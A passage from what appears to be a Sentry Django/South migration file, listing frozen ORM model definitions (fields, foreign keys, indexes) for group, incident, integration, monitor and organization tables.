'logger': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'num_comments': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'resolved_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'score': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '0'}),
'short_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'time_spent_count': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '0'}),
'time_spent_total': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '0'}),
'times_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '1', 'db_index': 'True'})
},
'sentry.groupassignee': {
'Meta': {'unique_together': '()', 'object_name': 'GroupAssignee', 'db_table': "'sentry_groupasignee'", 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'assignee_set'", 'unique': 'True', 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'assignee_set'", 'to': "orm['sentry.Project']"}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'sentry_assignee_set'", 'null': 'True', 'to': "orm['sentry.Team']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'sentry_assignee_set'", 'null': 'True', 'to': "orm['sentry.User']"})
},
'sentry.groupbookmark': {
'Meta': {'unique_together': "(('project', 'user', 'group'),)", 'object_name': 'GroupBookmark', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'bookmark_set'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'bookmark_set'", 'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'sentry_bookmark_set'", 'to': "orm['sentry.User']"})
},
'sentry.groupcommitresolution': {
'Meta': {'unique_together': "(('group_id', 'commit_id'),)", 'object_name': 'GroupCommitResolution', 'index_together': '()'},
'commit_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'group_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'})
},
'sentry.groupemailthread': {
'Meta': {'unique_together': "(('email', 'group'), ('email', 'msgid'))", 'object_name': 'GroupEmailThread', 'index_together': '()'},
'date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'groupemail_set'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'msgid': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'groupemail_set'", 'to': "orm['sentry.Project']"})
},
'sentry.groupenvironment': {
'Meta': {'unique_together': "(('group', 'environment'),)", 'object_name': 'GroupEnvironment', 'index_together': "(('environment', 'first_release'),)"},
'environment': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Environment']"}),
'first_release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']", 'null': 'True', 'on_delete': 'models.DO_NOTHING'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'})
},
'sentry.grouphash': {
'Meta': {'unique_together': "(('project', 'hash'),)", 'object_name': 'GroupHash', 'index_together': '()'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'group_tombstone_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'state': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'})
},
'sentry.grouplink': {
'Meta': {'unique_together': "(('group_id', 'linked_type', 'linked_id'),)", 'object_name': 'GroupLink', 'index_together': '()'},
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'linked_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'linked_type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '1'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'db_index': 'True'}),
'relationship': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '2'})
},
'sentry.groupmeta': {
'Meta': {'unique_together': "(('group', 'key'),)", 'object_name': 'GroupMeta', 'index_together': '()'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.groupredirect': {
'Meta': {'unique_together': '()', 'object_name': 'GroupRedirect', 'index_together': '()'},
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'previous_group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'unique': 'True'})
},
'sentry.grouprelease': {
'Meta': {'unique_together': "(('group_id', 'release_id', 'environment'),)", 'object_name': 'GroupRelease', 'index_together': '()'},
'environment': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '64'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'release_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'})
},
'sentry.groupresolution': {
'Meta': {'unique_together': '()', 'object_name': 'GroupResolution', 'index_together': '()'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'unique': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'})
},
'sentry.grouprulestatus': {
'Meta': {'unique_together': "(('rule', 'group'),)", 'object_name': 'GroupRuleStatus', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_active': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'rule': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Rule']"}),
'status': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'sentry.groupseen': {
'Meta': {'unique_together': "(('user', 'group'),)", 'object_name': 'GroupSeen', 'index_together': '()'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'db_index': 'False'})
},
'sentry.groupshare': {
'Meta': {'unique_together': '()', 'object_name': 'GroupShare', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'unique': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'default': "'993f599bf9114fe1b88e46386a3514da'", 'unique': 'True', 'max_length': '32'})
},
'sentry.groupsnooze': {
'Meta': {'unique_together': '()', 'object_name': 'GroupSnooze', 'index_together': '()'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'count': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'unique': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'state': ('sentry.db.models.fields.jsonfield.JSONField', [], {'null': 'True'}),
'until': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'user_count': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'user_window': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'window': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'})
},
'sentry.groupsubscription': {
'Meta': {'unique_together': "(('group', 'user'),)", 'object_name': 'GroupSubscription', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'subscription_set'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'subscription_set'", 'to': "orm['sentry.Project']"}),
'reason': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.grouptagkey': {
'Meta': {'unique_together': "(('project_id', 'group_id', 'key'),)", 'object_name': 'GroupTagKey', 'index_together': '()'},
'group_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'values_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.grouptagvalue': {
'Meta': {'unique_together': "(('group_id', 'key', 'value'),)", 'object_name': 'GroupTagValue', 'db_table': "'sentry_messagefiltervalue'", 'index_together': "(('project_id', 'key', 'value', 'last_seen'),)"},
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'group_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'times_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.grouptombstone': {
'Meta': {'unique_together': '()', 'object_name': 'GroupTombstone', 'index_together': '()'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'level': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '40', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'previous_group_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'unique': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.identity': {
'Meta': {'unique_together': "(('idp', 'external_id'), ('idp', 'user'))", 'object_name': 'Identity', 'index_together': '()'},
'data': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_verified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'external_id': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'idp': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.IdentityProvider']"}),
'scopes': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'django.db.models.fields.TextField', [], {})}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.identityprovider': {
'Meta': {'unique_together': "(('type', 'external_id'),)", 'object_name': 'IdentityProvider', 'index_together': '()'},
'config': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'external_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'sentry.incident': {
'Meta': {'unique_together': "(('organization', 'identifier'),)", 'object_name': 'Incident', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_closed': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'date_detected': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_started': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'detection_uuid': ('sentry.db.models.fields.uuid.UUIDField', [], {'max_length': '32', 'null': 'True', 'db_index': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "u'incidents'", 'symmetrical': 'False', 'through': "orm['sentry.IncidentGroup']", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'identifier': ('django.db.models.fields.IntegerField', [], {}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "u'incidents'", 'symmetrical': 'False', 'through': "orm['sentry.IncidentProject']", 'to': "orm['sentry.Project']"}),
'query': ('django.db.models.fields.TextField', [], {}),
'status': ('django.db.models.fields.PositiveSmallIntegerField', [], {}),
'title': ('django.db.models.fields.TextField', [], {})
},
'sentry.incidentactivity': {
'Meta': {'unique_together': '()', 'object_name': 'IncidentActivity', 'index_together': '()'},
'comment': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event_stats_snapshot': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.TimeSeriesSnapshot']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'incident': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Incident']"}),
'previous_value': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'type': ('django.db.models.fields.IntegerField', [], {}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'}),
'value': ('django.db.models.fields.TextField', [], {'null': 'True'})
},
'sentry.incidentgroup': {
'Meta': {'unique_together': "(('group', 'incident'),)", 'object_name': 'IncidentGroup', 'index_together': '()'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'db_index': 'False'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'incident': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Incident']"})
},
'sentry.incidentproject': {
'Meta': {'unique_together': "(('project', 'incident'),)", 'object_name': 'IncidentProject', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'incident': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Incident']"}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'db_index': 'False'})
},
'sentry.incidentseen': {
'Meta': {'unique_together': "(('user', 'incident'),)", 'object_name': 'IncidentSeen', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'incident': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Incident']"}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'db_index': 'False'})
},
'sentry.integration': {
'Meta': {'unique_together': "(('provider', 'external_id'),)", 'object_name': 'Integration', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'external_id': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'metadata': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'organizations': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "u'integrations'", 'symmetrical': 'False', 'through': "orm['sentry.OrganizationIntegration']", 'to': "orm['sentry.Organization']"}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "u'integrations'", 'symmetrical': 'False', 'through': "orm['sentry.ProjectIntegration']", 'to': "orm['sentry.Project']"}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'null': 'True'})
},
'sentry.integrationexternalproject': {
'Meta': {'unique_together': "(('organization_integration_id', 'external_id'),)", 'object_name': 'IntegrationExternalProject', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'external_id': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'organization_integration_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'resolved_status': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'unresolved_status': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'sentry.latestrelease': {
'Meta': {'unique_together': "(('repository_id', 'environment_id'),)", 'object_name': 'LatestRelease', 'index_together': '()'},
'commit_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'deploy_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'environment_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'release_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'repository_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.lostpasswordhash': {
'Meta': {'unique_together': '()', 'object_name': 'LostPasswordHash', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'unique': 'True'})
},
'sentry.monitor': {
'Meta': {'unique_together': '()', 'object_name': 'Monitor', 'index_together': "(('type', 'next_checkin'),)"},
'config': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'guid': ('sentry.db.models.fields.uuid.UUIDField', [], {'auto_add': "'uuid:uuid4'", 'unique': 'True', 'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_checkin': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'next_checkin': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.monitorcheckin': {
'Meta': {'unique_together': '()', 'object_name': 'MonitorCheckIn', 'index_together': '()'},
'config': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_updated': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'duration': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'guid': ('sentry.db.models.fields.uuid.UUIDField', [], {'auto_add': "'uuid:uuid4'", 'unique': 'True', 'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'location': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.MonitorLocation']", 'null': 'True'}),
'monitor': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Monitor']"}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.monitorlocation': {
'Meta': {'unique_together': '()', 'object_name': 'MonitorLocation', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'guid': ('sentry.db.models.fields.uuid.UUIDField', [], {'auto_add': "'uuid:uuid4'", 'unique': 'True', 'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'sentry.option': {
'Meta': {'unique_together': '()', 'object_name': 'Option', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'value': ('sentry.db.models.fields.encrypted.EncryptedPickledObjectField', [], {})
},
'sentry.organization': {
'Meta': {'unique_together': '()', 'object_name': 'Organization', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'default_role': ('django.db.models.fields.CharField', [], {'default': "'member'", 'max_length': '32'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '1'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "u'org_memberships'", 'symmetrical': 'False', 'through': "orm['sentry.OrganizationMember']", 'to': "orm['sentry.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.organizationaccessrequest': {
'Meta': {'unique_together': "(('team', 'member'),)", 'object_name': 'OrganizationAccessRequest', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'member': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.OrganizationMember']"}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Team']"})
},
'sentry.organizationavatar': {
'Meta': {'unique_together': '()', 'object_name': 'OrganizationAvatar', 'index_together': '()'},
'avatar_type': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'avatar'", 'unique': 'True', 'to': "orm['sentry.Organization']"})
},
'sentry.organizationintegration': {
'Meta': {'unique_together': "(('organization', 'integration'),)", 'object_name': 'OrganizationIntegration', 'index_together': '()'},
'config': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'default_auth_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
